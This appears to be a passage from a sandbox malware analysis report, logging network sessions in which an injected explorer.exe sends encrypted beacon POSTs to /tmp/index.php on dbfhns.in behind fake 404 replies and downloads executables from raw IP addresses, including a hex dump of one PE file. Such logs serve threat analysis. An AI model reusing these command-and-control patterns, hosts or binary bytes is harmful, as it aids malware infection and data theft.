                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vuzTOK>.pD8+)|>^mB;;D]Z-Q|*E.%|H9k.u2a3
                                                          May 27, 2024 00:27:25.491470098 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:25 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.549721187.143.58.5801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:25.797523975 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://unanbdkiibq.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 299
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:25.797558069 CEST299OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 44 1c a6 f7
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vuDwGnbl3qDt=GmXd)]FE]W5Dg UMx{C> jSIip\v\mF"QAdq#
                                                          May 27, 2024 00:27:26.818525076 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:26 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.549723187.143.58.5801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:26.891612053 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://hfcngeudnubrryg.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 111
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:26.891612053 CEST111OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 22 2c b3 85
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vu",NVosN1b]
                                                          May 27, 2024 00:27:27.886953115 CEST190INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:27 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61
                                                          Data Ascii: #\+X$mD2 *a


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.54972523.145.40.124801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:27.951931000 CEST164OUTGET /pintxi1lv.exe HTTP/1.1
                                                          Connection: Keep-Alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: 23.145.40.124


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.549729185.235.137.54805640C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:32.903697968 CEST205OUTGET /file/host_so.exe HTTP/1.1
                                                          Connection: Keep-Alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Host: 185.235.137.54


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.549737187.143.58.5801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:49.450237989 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://fgaaagvpavk.org/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 313
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:49.450237989 CEST313OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 29 0b fa aa
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vu)nRCH^IN^$[_*|a]3JT#d/:u&iyV"wq0M-]:vvXttx.bmb%~
                                                          May 27, 2024 00:27:50.448736906 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:50 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.549739187.143.58.5801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:50.525998116 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://qvvaotfskdoxlio.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 361
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:50.526015997 CEST361OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 6c 41 db 89
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vulA'fk{n[>[c[\k~tJSZ0y#A(S2^KzjQ>cfST7m5rc=XR4$C[
                                                          May 27, 2024 00:27:51.532396078 CEST210INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:51 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13
                                                          Data Ascii: #\ Z$jDm*w_c*^nUSssD


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.54974191.202.233.231801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:51.635869980 CEST184OUTGET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1
                                                          Connection: Keep-Alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: 91.202.233.231
                                                          May 27, 2024 00:27:52.326961040 CEST1236INHTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:52 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Last-Modified: Sun, 26 May 2024 22:23:46 GMT
                                                          ETag: "20ba00-61962daa50080"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 2144768
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-msdos-program
                                                          Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 66 09 00 00 50 17 00 00 00 00 00 60 75 09 00 00 10 00 00 00 80 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 [TRUNCATED]
                                                          Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*fP`u@ !@<"0 CODEef `DATAL.0j@BSS.idata<"$@.tls.rdata@P.reloc @P.rsrc00@P ! @P
                                                          May 27, 2024 00:27:52.327547073 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: @Boolean@FalseTrue@,@Char@@SmallintX@Integerp@Byte@Word
                                                          May 27, 2024 00:27:52.329619884 CEST1236INData Raw: 8b 06 8b 10 89 16 5e 5b c3 90 89 00 89 40 04 c3 8b c0 53 56 8b f2 8b d8 e8 9d ff ff ff 85 c0 75 05 33 c0 5e 5b c3 8b 16 89 50 08 8b 56 04 89 50 0c 8b 13 89 10 89 58 04 89 42 04 89 03 b0 01 5e 5b c3 8b 50 04 8b 08 89 0a 89 51 04 8b 15 e8 b5 49 00
                                                          Data Ascii: ^[@SVu3^[PVPXB^[PQIISVWUQ$]$PV;SS;uCCFF;CuCF;uVu3Z]_^[SVWU2C;rpJk;wb;uB
                                                          May 27, 2024 00:27:52.329655886 CEST1236INData Raw: 4c 24 04 8b d7 2b 53 0c 8b 43 08 03 43 0c e8 db fc ff ff 83 7c 24 04 00 74 33 8d 4c 24 0c 8d 54 24 04 8b c5 e8 5d fb ff ff 83 7c 24 0c 00 75 b1 8d 4c 24 0c 8b 54 24 08 8b 44 24 04 e8 25 fd ff ff 8b 04 24 33 d2 89 10 e9 90 00 00 00 8d 4c 24 04 8b
                                                          Data Ascii: L$+SCC|$t3L$T$]|$uL$T$D$%$3L$|$t4L$T$|$fL$T$D$$3Hk;u:;{5$q$8t($@C$@)C{u$3]_^[SVW$
                                                          May 27, 2024 00:27:52.333678961 CEST1236INData Raw: f4 8b fa 8b f0 c6 04 24 00 8b c6 e8 96 fe ff ff 8b d8 85 db 0f 84 82 00 00 00 8b 6b 08 8b c5 03 43 0c 8b d0 8d 0c 37 2b d1 83 fa 0c 7f 04 8b f8 2b fe 8b c6 2b c5 83 f8 0c 7d 14 8d 4c 24 01 8b d6 2b 53 08 03 d7 8b c5 e8 c5 fb ff ff eb 11 8d 4c 24
                                                          Data Ascii: $kC7+++}L$+SL$Fl$t4+cD$SS;s7+T$$$]_^[@SVWsp7y$IDu$I\[:
                                                          May 27, 2024 00:27:52.335998058 CEST1236INData Raw: e8 11 18 00 00 eb 32 8b c3 e8 b4 fd ff ff 89 45 fc 33 c0 5a 59 59 64 89 10 68 27 23 40 00 80 3d 4d b0 49 00 00 74 0a 68 cc b5 49 00 e8 fd f0 ff ff c3 e9 fb 16 00 00 eb e5 8b 45 fc 5f 5e 5b 59 59 5d c3 8d 40 00 55 8b ec 51 53 56 57 8b d8 33 c0 a3
                                                          Data Ascii: 2E3ZYYdh'#@=MIthIE_^[YY]@UQSVW3I=IufuIEa3Uh$@d1d!=MIthIuII%)ItEP|tI
                                                          May 27, 2024 00:27:52.336033106 CEST776INData Raw: 50 89 c8 ff 15 44 80 49 00 59 09 c0 74 19 89 01 c3 b0 02 e9 fa 00 00 00 89 10 89 c8 ff 15 40 80 49 00 09 c0 75 eb c3 b0 01 e9 e4 00 00 00 85 d2 74 10 50 89 d0 ff 15 3c 80 49 00 59 09 c0 74 e7 89 01 c3 8d 40 00 e8 4f 3b 00 00 83 b8 00 00 00 00 00
                                                          Data Ascii: PDIYt@IutP<IYt@O;tA;@3/;t!;@3SV;t:^:3F3^[@I}SV=ItIu:
                                                          May 27, 2024 00:27:52.336065054 CEST1236INData Raw: fe ff ff 8b c6 5e 5b c3 8b c0 56 57 89 c7 31 c0 8a 07 89 d6 31 d2 8a 16 46 00 d0 72 12 38 c8 77 0e 89 d1 8a 17 88 07 47 01 d7 f3 a4 5f 5e c3 88 c8 2a 0f 76 f7 88 ca eb e8 c3 33 c9 8a 0a 41 92 e8 65 fe ff ff c3 53 8a 1a 3a cb 76 02 8b cb 88 08 42
                                                          Data Ascii: ^[VW11Fr8wG_^*v3AeS:vB@K[SVW11FG)wRt&9uDJtN_9u7JuZt:u/JtN:Ou$JtN:OuZ8u8u8u8_^[SVQt&
                                                          May 27, 2024 00:27:52.339807987 CEST1236INData Raw: cc ce 1b c2 d3 4e 40 a0 84 14 40 61 51 59 84 52 40 c8 a5 19 90 b9 a5 6f a5 55 40 3a 0f 20 f4 27 8f cb ce 58 40 84 09 94 f8 78 39 3f 81 5c 40 e5 0b b9 36 d7 07 8f a1 5f 40 df 4e 67 04 cd c9 f2 c9 62 40 96 22 81 45 40 7c 6f fc 65 40 9e b5 70 2b a8
                                                          Data Ascii: N@@aQYR@oU@: 'X@x9?\@6_@Ngb@"E@|oe@p+i@Ix@=AGA+BkU'9p|B0<RB~QC/j\&Cv)/&D'DDYdEJzEb>9FFuu
                                                          May 27, 2024 00:27:52.341394901 CEST1236INData Raw: eb 02 8b 36 8b 7e d0 85 ff 74 0d 0f b7 0f 51 83 c7 02 f2 66 af 74 0a 59 8b 76 dc 85 f6 75 e3 5f c3 58 01 c0 29 c8 8b 74 47 fc 5f c3 8b c0 50 51 8b 00 e8 c7 ff ff ff 59 58 74 02 ff e6 59 e9 57 f5 ff ff c3 8b c0 eb 02 8b 00 39 d0 74 08 8b 40 dc 85
                                                          Data Ascii: 6~tQftYvu_X)tG_PQYXtYW9t@u@@@Vf2ftfsPpXt^^aSVW11ptf>N8tfOu@u\12uIuF_^[SVW
                                                          May 27, 2024 00:27:52.341428041 CEST1236INData Raw: b0 49 00 8b 54 24 1c e8 32 fd ff ff 80 3d 2c 80 49 00 00 76 1e 80 3d 28 80 49 00 00 77 15 8d 4c 24 04 50 51 e8 59 d9 ff ff 83 f8 00 58 0f 84 9f 00 00 00 89 c2 8b 44 24 14 8b 48 0c eb 27 80 3d 2c 80 49 00 01 76 1e 80 3d 28 80 49 00 00 77 15 50 8d
                                                          Data Ascii: IT$2=,Iv=(IwL$PQYXD$H'=,Iv=(IwPD$RQP%YZXtm1dSPRQT$(HVjPh9@RI[|$()oG9@D$c#Z)AD$T$@tJBP:


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.549744187.143.58.5801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:54.236884117 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ipxqunnvdoai.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 332
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:54.236920118 CEST332OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2c 5b 03 6b 2c 90 f4 76 0b 75 34 22 df e7
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA ,[k,vu4"Q?RRErVTX%/bEJ,+$V\5a37)&}>F$2J^'CffhA*O"$^M
                                                          May 27, 2024 00:27:55.208365917 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:55 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.549773186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:29:06.967757940 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://xrjlnlbrgajqsny.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 220
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:06.967777967 CEST220OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 61 0a b7 ba
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuaV\jzfYx!hRDMQP|(",rhF']uJ#C(>Q?4@YW/g
                                                          May 27, 2024 00:29:08.052684069 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:07 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.549774186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:29:14.086644888 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://uopupolbajboxnf.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 340
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:29:14.086675882 CEST340OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 51 57 c6 a6
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuQWJZsI<n>)O8s@tB)<MF|=US3W]h\L{/5{rx(Iv2PDzD\no\Yg\
                                                          May 27, 2024 00:29:15.142350912 CEST151INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:29:14 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.549775186.112.12.192801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:29:19.604016066 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://imsuruvsrfypw.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 276
                                                          Host: dbfhns.in
